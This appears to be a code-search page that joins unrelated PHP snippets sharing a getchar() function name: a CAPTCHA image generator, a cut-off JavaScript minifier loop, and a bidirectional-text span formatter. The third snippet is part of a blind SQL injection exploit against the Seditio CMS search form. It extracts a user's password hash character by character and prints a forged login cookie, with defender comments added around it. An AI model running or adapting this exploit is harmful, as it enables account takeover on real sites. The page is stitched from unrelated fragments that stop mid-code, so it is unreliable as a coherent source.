Beispiel #1
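/**
 * Draw a CAPTCHA image, send it to the client as JPEG and store the expected
 * answer in the session.
 *
 * The characters come from getchar(), which is defined elsewhere and is not
 * part of this listing (presumably it returns $num characters of the kind
 * selected by $type - confirm). The session must already be started by the
 * caller, otherwise the write to $_SESSION is not persisted.
 *
 * NOTE(review): the code that checks the user's answer is not shown. It should
 * compare against $_SESSION['code'] with hash_equals() and unset the session
 * entry after every attempt, so that one image cannot be guessed repeatedly or
 * replayed. rand() is acceptable for the cosmetic noise drawn here; the
 * characters themselves should be chosen with random_int() inside getchar().
 *
 * @param int $num    Number of characters in the code; also sets the image width (20px each).
 * @param int $type   Passed through to getchar() unchanged.
 * @param int $is_pix Truthy to draw noise pixels, noise lines and a border.
 *
 * @return void The JPEG is written directly to the output.
 */
function getcode($num = 4, $type = 0, $is_pix = 0)
{
    // Settings
    $str = getchar($num, $type);
    $width = 20 * $num;
    $height = 30;
    // define() cannot overwrite an existing constant, so a second call in the
    // same request used to keep the first call's noise setting (and raised a
    // warning). The decision is now taken from the argument; the constant is
    // still published once for any code that reads ADD_PIX.
    $addNoise = (bool) $is_pix;
    if (!defined("ADD_PIX")) {
        define("ADD_PIX", $is_pix);
    }
    // The expected answer stays on the server; only the picture goes to the client.
    $_SESSION['code'] = $str;
    // Create the canvas
    $im = imagecreatetruecolor($width, $height);
    // Fill the background with white
    $bg = imagecolorallocate($im, 255, 255, 255);
    imagefill($im, 0, 0, $bg);
    // Draw the characters, each with a random colour and a random tilt.
    // Never index past the end of the string if getchar() returned fewer
    // characters than requested.
    $glyphs = min($num, strlen((string) $str));
    for ($i = 0; $i < $glyphs; $i++) {
        $color = imagecolorallocate($im, rand(0, 255), rand(0, 255), rand(0, 255));
        imagettftext($im, 18, rand(-35, 35), 5 + 18 * $i, 25, $color, "Vera.ttf", $str[$i]);
    }
    /* Optional noise */
    if ($addNoise) {
        // Valid coordinates run from 0 to size - 1; the former upper bounds of
        // $width and $height lay one pixel outside the canvas.
        $maxX = $width - 1;
        $maxY = $height - 1;
        // Noise pixels
        for ($i = 0; $i < 60; $i++) {
            $color = imagecolorallocate($im, rand(0, 255), rand(0, 255), rand(0, 255));
            imagesetpixel($im, rand(0, $maxX), rand(0, $maxY), $color);
        }
        // Noise lines
        for ($i = 0; $i < 2; $i++) {
            $color = imagecolorallocate($im, rand(0, 255), rand(0, 255), rand(0, 255));
            imageline($im, rand(0, $maxX), rand(0, $maxY), rand(0, $maxX), rand(0, $maxY), $color);
        }
        // Rectangular border
        $color = imagecolorallocate($im, rand(0, 255), rand(0, 255), rand(0, 255));
        imagerectangle($im, 0, 0, $maxX, $maxY, $color);
    }
    // Send the image. A cached copy would no longer match the code stored in
    // the session, so caching is switched off.
    header("content-type:image/jpeg");
    header("Cache-Control: no-store");
    imagejpeg($im);
    // Release the image
    imagedestroy($im);
}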
 * javascript code in order to make it run a little faster.
 *
 * @author Peter Fokker <*****@*****.**>
 * @copyright Copyright (C) 2008-2013 Ingenieursbureau PSD/Peter Fokker
 * @license http://websiteatschool.eu/license.html GNU AGPLv3+Additional Terms
 * @version $Id: minjs.php,v 1.1 2013/06/12 14:00:24 pfokker Exp $
 */
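// Scanner state for the character-by-character loop that follows.
$c = '';              // character currently being examined
// The next four flags are not used in the part of the loop visible in this
// listing; presumably they track "/", "//" and "/* ... */" handling - confirm.
$comment = FALSE;
$slash = FALSE;
$slashslash = FALSE;
$asterisk = FALSE;
$line = '';           // output accumulated so far
$quoted = FALSE;      // TRUE while inside a quoted string
$quote = '';          // compared with $c to detect the end of the quoted string
// The loop tests $backslash as soon as $quoted is TRUE, and nothing in the
// visible code assigns it before that test; initialise it with the other
// flags so the first test does not read an undefined variable.
$backslash = FALSE;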
while (($c = getchar()) !== FALSE) {
    if ($quoted) {
        if ($backslash) {
            $line .= $c;
            $backslash = FALSE;
        } elseif ($c == '\\') {
            $line .= $c;
            $backslash = TRUE;
        } elseif ($c == $quote) {
            $line .= $c;
            $quoted = FALSE;
            $backslash = FALSE;
        } else {
            $line .= $c;
        }
    } else {
Beispiel #3
    print "OK\n";
} else {
    die("\n[-] Exploit failed\n");
}
// Recovers a 32-character value one position at a time. getchar() (declared
// after this run; its body is cut off in this listing) is used only as a
// yes/no oracle: the loop never reads query output or error text.
//
// NOTE(defender): each probe is presumably one submission of the search form
// built in getchar() - confirm against the full function. With one range probe
// plus up to ten candidate probes per position, the server-side trace would be
// a burst of near-identical search requests from a single client. The root fix
// is to bind the search parameters in a prepared statement; filtering
// individual payload strings does not remove the injection point.
print "    Getting hash...";
$hash = '';
for ($i = 1; $i <= 32; $i++) {
    // Range probe: a false answer to ">57" selects the ASCII digits 48-57,
    // a true answer selects 97-102 ('a'-'f'), i.e. lowercase hex.
    if (!getchar(">57", $i)) {
        $min = 48;
        $max = 57;
    } else {
        $min = 97;
        $max = 102;
    }
    // Try each candidate code in the chosen range; the first true answer is
    // taken as the character at position $i.
    for ($j = $min; $j <= $max; $j++) {
        if (getchar("+LIKE+{$j}", $i)) {
            $hash .= chr($j);
            break;
        }
    }
}
print "[+] Done! hash - {$hash}\n";
// NOTE(defender): the cookie value is assembled from $id, the recovered hash
// and fixed strings only. If the application accepts it, the stored hash acts
// as the login credential itself, so any read access to the user table equals
// account takeover. Random server-side session tokens, unrelated to the
// password hash, remove that equivalence.
print "[+] Cookie to log in: \nSEDITIO=" . base64_encode($id . ":_:" . $hash . ":_:ice") . "\n";
function getchar($query, $pos, $status = true)
{
    global $host, $path, $prefix, $id;
    if ($status) {
        status();
    }
    $data = "sq=InATeam&frm_sub%5B%5D=9999&sea_frmtitle=1&sea_frmtext=1&sea_pagtitle=1";
    $data .= "&sea_pagdesc=1&sea_pagtext=1&searchin_pag=1&pag_sub%5B%5D=qwerty')";
Beispiel #4
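/**
 * Finish current span
 *
 * Cuts the text of the span under construction off the end of $result
 * (everything from $posSpanStart), moves blanks, line-break markers, numeric
 * strings, punctuation and "(xnnn)" ID numbers in or out of the span depending
 * on $currentState and $TEXT_DIRECTION, and appends the re-wrapped text to
 * $result again. Text that belongs to the following span is prefixed to the
 * global $waitingText.
 *
 * Fix: "&nbsp;" is six bytes long. Five of the trimming loops removed only one
 * byte after copying the entity, which left a truncated "&nbsp" at the end of
 * the span while a complete "&nbsp;" was emitted as well. They now remove six
 * bytes, like the other trimming loops in this function.
 *
 * NOTE(review): the text is concatenated into markup without escaping here.
 * Whether $result has been HTML-escaped before it reaches this function is not
 * visible in this listing - confirm at the caller.
 *
 * Globals read: $previousState, $currentState, $posSpanStart, $TEXT_DIRECTION,
 * $startLTR, $endLTR, $startRTL, $endRTL, $numbers, $punctuation.
 * Globals written: $waitingText.
 * Relies on stripLRMRLM(), getchar() and starredName(), defined elsewhere.
 *
 * @param string $result Markup built so far; modified in place.
 * @param bool   $theEnd TRUE when no further span follows; trailing numeric
 *                       strings and a trailing " - " are then left in place
 *                       instead of being handed to the next span.
 *
 * @return void
 */
function finishCurrentSpan(&$result, $theEnd = false)
{
    global $previousState, $currentState, $posSpanStart, $TEXT_DIRECTION, $waitingText;
    global $startLTR, $endLTR, $startRTL, $endRTL, $lenStart, $lenEnd;
    global $numbers, $punctuation;
    $textSpan = substr($result, $posSpanStart);
    $result = substr($result, 0, $posSpanStart);
    // Get rid of empty spans, so that our check for presence of RTL will work
    $result = str_replace(array($startLTR . $endLTR, $startRTL . $endRTL), '', $result);
    // Look for numeric strings that are times (hh:mm:ss).  These have to be separated from surrounding numbers.
    $tempResult = '';
    while ($textSpan != '') {
        $posColon = strpos($textSpan, ':');
        if ($posColon === false) {
            break;
        }
        // No more possible time strings
        $posLRE = strpos($textSpan, WT_UTF8_LRE);
        if ($posLRE === false) {
            break;
        }
        // No more numeric strings
        $posPDF = strpos($textSpan, WT_UTF8_PDF, $posLRE);
        if ($posPDF === false) {
            break;
        }
        // No more numeric strings
        // The offsets of 3 below skip one LRE or PDF control code (3 bytes each in UTF-8).
        $tempResult .= substr($textSpan, 0, $posLRE + 3);
        // Copy everything preceding the numeric string
        $numericString = substr($textSpan, $posLRE + 3, $posPDF - $posLRE);
        // Separate the entire numeric string
        $textSpan = substr($textSpan, $posPDF + 3);
        $posColon = strpos($numericString, ':');
        if ($posColon === false) {
            // Nothing that looks like a time here
            $tempResult .= $numericString;
            continue;
        }
        // Appending the separator guarantees that strpos() finds a position.
        $posBlank = strpos($numericString . ' ', ' ');
        $posNbsp = strpos($numericString . '&nbsp;', '&nbsp;');
        if ($posBlank < $posNbsp) {
            $posSeparator = $posBlank;
            $lengthSeparator = 1;
        } else {
            $posSeparator = $posNbsp;
            $lengthSeparator = 6;
        }
        if ($posColon > $posSeparator) {
            // We have a time string preceded by a blank: Exclude that blank from the numeric string
            $tempResult .= substr($numericString, 0, $posSeparator);
            $tempResult .= WT_UTF8_PDF;
            $tempResult .= substr($numericString, $posSeparator, $lengthSeparator);
            $tempResult .= WT_UTF8_LRE;
            $numericString = substr($numericString, $posSeparator + $lengthSeparator);
        }
        $posBlank = strpos($numericString, ' ');
        $posNbsp = strpos($numericString, '&nbsp;');
        if ($posBlank === false && $posNbsp === false) {
            // The time string isn't followed by a blank
            $textSpan = $numericString . $textSpan;
            continue;
        }
        // We have a time string followed by a blank: Exclude that blank from the numeric string
        if ($posBlank === false) {
            $posSeparator = $posNbsp;
            $lengthSeparator = 6;
        } else {
            if ($posNbsp === false) {
                $posSeparator = $posBlank;
                $lengthSeparator = 1;
            } else {
                if ($posBlank < $posNbsp) {
                    $posSeparator = $posBlank;
                    $lengthSeparator = 1;
                } else {
                    $posSeparator = $posNbsp;
                    $lengthSeparator = 6;
                }
            }
        }
        $tempResult .= substr($numericString, 0, $posSeparator);
        $tempResult .= WT_UTF8_PDF;
        $tempResult .= substr($numericString, $posSeparator, $lengthSeparator);
        $posSeparator += $lengthSeparator;
        $numericString = substr($numericString, $posSeparator);
        $textSpan = WT_UTF8_LRE . $numericString . $textSpan;
    }
    $textSpan = $tempResult . $textSpan;
    $trailingBlanks = '';
    $trailingBreaks = '';
    /* ****************************** LTR text handling ******************************** */
    if ($currentState == 'LTR') {
        // Move trailing numeric strings to the following RTL text.  Include any blanks preceding or following the numeric text too.
        if ($TEXT_DIRECTION == 'rtl' && $previousState == 'RTL' && !$theEnd) {
            $trailingString = '';
            $savedSpan = $textSpan;
            while ($textSpan != '') {
                // Look for trailing spaces and tentatively move them
                if (substr($textSpan, -1) == ' ') {
                    $trailingString = ' ' . $trailingString;
                    $textSpan = substr($textSpan, 0, -1);
                    continue;
                }
                if (substr($textSpan, -6) == '&nbsp;') {
                    $trailingString = '&nbsp;' . $trailingString;
                    // Remove the whole six-byte entity (was -1)
                    $textSpan = substr($textSpan, 0, -6);
                    continue;
                }
                if (substr($textSpan, -3) != WT_UTF8_PDF) {
                    // There is no trailing numeric string
                    $textSpan = $savedSpan;
                    break;
                }
                // We have a numeric string
                $posStartNumber = strrpos($textSpan, WT_UTF8_LRE);
                if ($posStartNumber === false) {
                    $posStartNumber = 0;
                }
                $trailingString = substr($textSpan, $posStartNumber, strlen($textSpan) - $posStartNumber) . $trailingString;
                $textSpan = substr($textSpan, 0, $posStartNumber);
                // Look for more spaces and move them too
                while ($textSpan != '') {
                    if (substr($textSpan, -1) == ' ') {
                        $trailingString = ' ' . $trailingString;
                        $textSpan = substr($textSpan, 0, -1);
                        continue;
                    }
                    if (substr($textSpan, -6) == '&nbsp;') {
                        $trailingString = '&nbsp;' . $trailingString;
                        // Remove the whole six-byte entity (was -1)
                        $textSpan = substr($textSpan, 0, -6);
                        continue;
                    }
                    break;
                }
                $waitingText = $trailingString . $waitingText;
                break;
            }
        }
        $savedSpan = $textSpan;
        // Move any trailing <br>, optionally preceded or followed by blanks, outside this LTR span
        while ($textSpan != '') {
            if (substr($textSpan, -1) == ' ') {
                $trailingBlanks = ' ' . $trailingBlanks;
                $textSpan = substr($textSpan, 0, -1);
                continue;
            }
            // The '......' padding keeps substr() well-defined for spans shorter than six bytes
            if (substr('......' . $textSpan, -6) == '&nbsp;') {
                $trailingBlanks = '&nbsp;' . $trailingBlanks;
                $textSpan = substr($textSpan, 0, -6);
                continue;
            }
            break;
        }
        // NOTE(review): a 9-byte tail is compared with the marker literal, and 9 is
        // also the width used below when skipping <RTLbr>. The literal as printed
        // here is shorter than 9 bytes - confirm it against the original file.
        while (substr($textSpan, -9) == '<LTRbr>') {
            $trailingBreaks = '<br>' . $trailingBreaks;
            // Plain <br> because it’s outside a span
            $textSpan = substr($textSpan, 0, -9);
        }
        if ($trailingBreaks != '') {
            while ($textSpan != '') {
                if (substr($textSpan, -1) == ' ') {
                    $trailingBreaks = ' ' . $trailingBreaks;
                    $textSpan = substr($textSpan, 0, -1);
                    continue;
                }
                if (substr('......' . $textSpan, -6) == '&nbsp;') {
                    $trailingBreaks = '&nbsp;' . $trailingBreaks;
                    $textSpan = substr($textSpan, 0, -6);
                    continue;
                }
                break;
            }
            $waitingText = $trailingBlanks . $waitingText;
            // Put those trailing blanks inside the following span
        } else {
            $textSpan = $savedSpan;
        }
        $savedSpan = $textSpan;
        $trailingBlanks = '';
        $trailingPunctuation = '';
        $trailingID = '';
        $trailingSeparator = '';
        $leadingSeparator = '';
        // Runs at most once: the body ends in an unconditional break, so this
        // "while" acts as an "if" on the page direction.
        while ($TEXT_DIRECTION == 'rtl') {
            if (strpos($result, $startRTL) !== false) {
                // Remove trailing blanks for inclusion in a separate LTR span
                while ($textSpan != '') {
                    if (substr($textSpan, -1) == ' ') {
                        $trailingBlanks = ' ' . $trailingBlanks;
                        $textSpan = substr($textSpan, 0, -1);
                        continue;
                    }
                    if (substr($textSpan, -6) == '&nbsp;') {
                        $trailingBlanks = '&nbsp;' . $trailingBlanks;
                        // Remove the whole six-byte entity (was -1)
                        $textSpan = substr($textSpan, 0, -6);
                        continue;
                    }
                    break;
                }
                // Remove trailing punctuation for inclusion in a separate LTR span
                if ($textSpan == '') {
                    $trailingChar = "\n";
                } else {
                    $trailingChar = substr($textSpan, -1);
                }
                if (strpos($punctuation, $trailingChar) !== false) {
                    $trailingPunctuation = $trailingChar;
                    $textSpan = substr($textSpan, 0, -1);
                }
            }
            // Remove trailing ID numbers that look like "(xnnn)" for inclusion in a separate LTR span
            while (true) {
                if (substr($textSpan, -1) != ')') {
                    break;
                }
                // There is no trailing ')'
                $posLeftParen = strrpos($textSpan, '(');
                if ($posLeftParen === false) {
                    break;
                }
                // There is no leading '('
                $temp = stripLRMRLM(substr($textSpan, $posLeftParen));
                // Get rid of UTF8 control codes
                // If the parenthesized text doesn't look like an ID number,
                // we don't want to touch it.
                // This check won’t work if somebody uses ID numbers with an unusual format.
                $offset = 1;
                $charArray = getchar($temp, $offset);
                // Get 1st character of parenthesized text
                if (strpos($numbers, $charArray['letter']) !== false) {
                    break;
                }
                $offset += $charArray['length'];
                // Point at 2nd character of parenthesized text
                if (strpos($numbers, substr($temp, $offset, 1)) === false) {
                    break;
                }
                // 1st character of parenthesized text is alpha, 2nd character is a digit; last has to be a digit too
                if (strpos($numbers, substr($temp, -2, 1)) === false) {
                    break;
                }
                $trailingID = substr($textSpan, $posLeftParen);
                $textSpan = substr($textSpan, 0, $posLeftParen);
                break;
            }
            // Look for " - " or blank preceding the ID number and remove it for inclusion in a separate LTR span
            $savedSpan = $textSpan;
            if ($trailingID != '') {
                while ($textSpan != '') {
                    if (substr($textSpan, -1) == ' ') {
                        $trailingSeparator = ' ' . $trailingSeparator;
                        $textSpan = substr($textSpan, 0, -1);
                        continue;
                    }
                    if (substr($textSpan, -6) == '&nbsp;') {
                        $trailingSeparator = '&nbsp;' . $trailingSeparator;
                        $textSpan = substr($textSpan, 0, -6);
                        continue;
                    }
                    if (substr($textSpan, -1) == '-') {
                        $trailingSeparator = '-' . $trailingSeparator;
                        $textSpan = substr($textSpan, 0, -1);
                        continue;
                    }
                    break;
                }
            }
            // Look for " - " preceding the text and remove it for inclusion in a separate LTR span
            $foundSeparator = false;
            $savedSpan = $textSpan;
            while ($textSpan != '') {
                if (substr($textSpan, 0, 1) == ' ') {
                    $leadingSeparator = ' ' . $leadingSeparator;
                    $textSpan = substr($textSpan, 1);
                    continue;
                }
                if (substr($textSpan, 0, 6) == '&nbsp;') {
                    $leadingSeparator = '&nbsp;' . $leadingSeparator;
                    $textSpan = substr($textSpan, 6);
                    continue;
                }
                if (substr($textSpan, 0, 1) == '-') {
                    $leadingSeparator = '-' . $leadingSeparator;
                    $textSpan = substr($textSpan, 1);
                    $foundSeparator = true;
                    continue;
                }
                break;
            }
            if (!$foundSeparator) {
                $textSpan = $savedSpan;
                $leadingSeparator = '';
            }
            break;
        }
        // We're done: finish the span
        $textSpan = starredName($textSpan, 'LTR');
        // Wrap starred name in <u> and </u> tags
        while (true) {
            // Remove blanks that precede <LTRbr>
            if (strpos($textSpan, ' <LTRbr>') !== false) {
                $textSpan = str_replace(' <LTRbr>', '<LTRbr>', $textSpan);
                continue;
            }
            if (strpos($textSpan, '&nbsp;<LTRbr>') !== false) {
                $textSpan = str_replace('&nbsp;<LTRbr>', '<LTRbr>', $textSpan);
                continue;
            }
            break;
        }
        if ($leadingSeparator != '') {
            $result = $result . $startLTR . $leadingSeparator . $endLTR;
        }
        $result = $result . $textSpan . $endLTR;
        if ($trailingSeparator != '') {
            $result = $result . $startLTR . $trailingSeparator . $endLTR;
        }
        if ($trailingID != '') {
            $result = $result . $startLTR . $trailingID . $endLTR;
        }
        if ($trailingPunctuation != '') {
            $result = $result . $startLTR . $trailingPunctuation . $endLTR;
        }
        if ($trailingBlanks != '') {
            $result = $result . $startLTR . $trailingBlanks . $endLTR;
        }
    }
    /* ****************************** RTL text handling ******************************** */
    if ($currentState == 'RTL') {
        $savedSpan = $textSpan;
        // Move any trailing <br>, optionally followed by blanks, outside this RTL span
        while ($textSpan != '') {
            if (substr($textSpan, -1) == ' ') {
                $trailingBlanks = ' ' . $trailingBlanks;
                $textSpan = substr($textSpan, 0, -1);
                continue;
            }
            if (substr('......' . $textSpan, -6) == '&nbsp;') {
                $trailingBlanks = '&nbsp;' . $trailingBlanks;
                $textSpan = substr($textSpan, 0, -6);
                continue;
            }
            break;
        }
        // NOTE(review): same 9-byte comparison as for <LTRbr> in the LTR branch - confirm the marker literal.
        while (substr($textSpan, -9) == '<RTLbr>') {
            $trailingBreaks = '<br>' . $trailingBreaks;
            // Plain <br> because it’s outside a span
            $textSpan = substr($textSpan, 0, -9);
        }
        if ($trailingBreaks != '') {
            $waitingText = $trailingBlanks . $waitingText;
            // Put those trailing blanks inside the following span
        } else {
            $textSpan = $savedSpan;
        }
        // Move trailing numeric strings to the following LTR text.  Include any blanks preceding or following the numeric text too.
        if (!$theEnd && $TEXT_DIRECTION != 'rtl') {
            $trailingString = '';
            $savedSpan = $textSpan;
            while ($textSpan != '') {
                // Look for trailing spaces and tentatively move them
                if (substr($textSpan, -1) == ' ') {
                    $trailingString = ' ' . $trailingString;
                    $textSpan = substr($textSpan, 0, -1);
                    continue;
                }
                if (substr($textSpan, -6) == '&nbsp;') {
                    $trailingString = '&nbsp;' . $trailingString;
                    // Remove the whole six-byte entity (was -1)
                    $textSpan = substr($textSpan, 0, -6);
                    continue;
                }
                if (substr($textSpan, -3) != WT_UTF8_PDF) {
                    // There is no trailing numeric string
                    $textSpan = $savedSpan;
                    break;
                }
                // We have a numeric string
                $posStartNumber = strrpos($textSpan, WT_UTF8_LRE);
                if ($posStartNumber === false) {
                    $posStartNumber = 0;
                }
                $trailingString = substr($textSpan, $posStartNumber, strlen($textSpan) - $posStartNumber) . $trailingString;
                $textSpan = substr($textSpan, 0, $posStartNumber);
                // Look for more spaces and move them too
                while ($textSpan != '') {
                    if (substr($textSpan, -1) == ' ') {
                        $trailingString = ' ' . $trailingString;
                        $textSpan = substr($textSpan, 0, -1);
                        continue;
                    }
                    if (substr($textSpan, -6) == '&nbsp;') {
                        $trailingString = '&nbsp;' . $trailingString;
                        // Remove the whole six-byte entity (was -1)
                        $textSpan = substr($textSpan, 0, -6);
                        continue;
                    }
                    break;
                }
                $waitingText = $trailingString . $waitingText;
                break;
            }
        }
        // Trailing " - " needs to be prefixed to the following span
        if (!$theEnd && substr('...' . $textSpan, -3) == ' - ') {
            $textSpan = substr($textSpan, 0, -3);
            $waitingText = ' - ' . $waitingText;
        }
        while ($TEXT_DIRECTION == 'rtl') {
            // Look for " - " preceding <RTLbr> and relocate it to the front of the string
            $posDashString = strpos($textSpan, ' - <RTLbr>');
            if ($posDashString === false) {
                break;
            }
            $posStringStart = strrpos(substr($textSpan, 0, $posDashString), '<RTLbr>');
            if ($posStringStart === false) {
                $posStringStart = 0;
            } else {
                $posStringStart += 9;
            }
            // Point to the first char following the last <RTLbr>
            $textSpan = substr($textSpan, 0, $posStringStart) . ' - ' . substr($textSpan, $posStringStart, $posDashString - $posStringStart) . substr($textSpan, $posDashString + 3);
        }
        // Strip leading spaces from the RTL text
        $countLeadingSpaces = 0;
        while ($textSpan != '') {
            if (substr($textSpan, 0, 1) == ' ') {
                $countLeadingSpaces++;
                $textSpan = substr($textSpan, 1);
                continue;
            }
            if (substr($textSpan, 0, 6) == '&nbsp;') {
                $countLeadingSpaces++;
                $textSpan = substr($textSpan, 6);
                continue;
            }
            break;
        }
        // Strip trailing spaces from the RTL text
        $countTrailingSpaces = 0;
        while ($textSpan != '') {
            if (substr($textSpan, -1) == ' ') {
                $countTrailingSpaces++;
                $textSpan = substr($textSpan, 0, -1);
                continue;
            }
            if (substr($textSpan, -6) == '&nbsp;') {
                $countTrailingSpaces++;
                $textSpan = substr($textSpan, 0, -6);
                continue;
            }
            break;
        }
        // Look for trailing " -", reverse it, and relocate it to the front of the string
        if (substr($textSpan, -2) == ' -') {
            $posDashString = strlen($textSpan) - 2;
            $posStringStart = strrpos(substr($textSpan, 0, $posDashString), '<RTLbr>');
            if ($posStringStart === false) {
                $posStringStart = 0;
            } else {
                $posStringStart += 9;
            }
            // Point to the first char following the last <RTLbr>
            $textSpan = substr($textSpan, 0, $posStringStart) . '- ' . substr($textSpan, $posStringStart, $posDashString - $posStringStart) . substr($textSpan, $posDashString + 2);
        }
        // The stripped blanks are put back as plain spaces, one per blank or &nbsp; counted above
        if ($countLeadingSpaces != 0) {
            $newLength = strlen($textSpan) + $countLeadingSpaces;
            $textSpan = str_pad($textSpan, $newLength, ' ', $TEXT_DIRECTION == 'rtl' ? STR_PAD_LEFT : STR_PAD_RIGHT);
        }
        if ($countTrailingSpaces != 0) {
            if ($TEXT_DIRECTION == 'ltr') {
                if ($trailingBreaks == '') {
                    // Move trailing RTL spaces to front of following LTR span
                    $newLength = strlen($waitingText) + $countTrailingSpaces;
                    $waitingText = str_pad($waitingText, $newLength, ' ', STR_PAD_LEFT);
                }
            } else {
                $newLength = strlen($textSpan) + $countTrailingSpaces;
                $textSpan = str_pad($textSpan, $newLength, ' ', STR_PAD_RIGHT);
            }
        }
        // We're done: finish the span
        $textSpan = starredName($textSpan, 'RTL');
        // Wrap starred name in <u> and </u> tags
        $result = $result . $textSpan . $endRTL;
    }
    // Any other state: put the text back without wrapping it in a span
    if ($currentState != 'LTR' && $currentState != 'RTL') {
        $result = $result . $textSpan;
    }
    $result .= $trailingBreaks;
    // Get rid of any waiting <br>
    return;
}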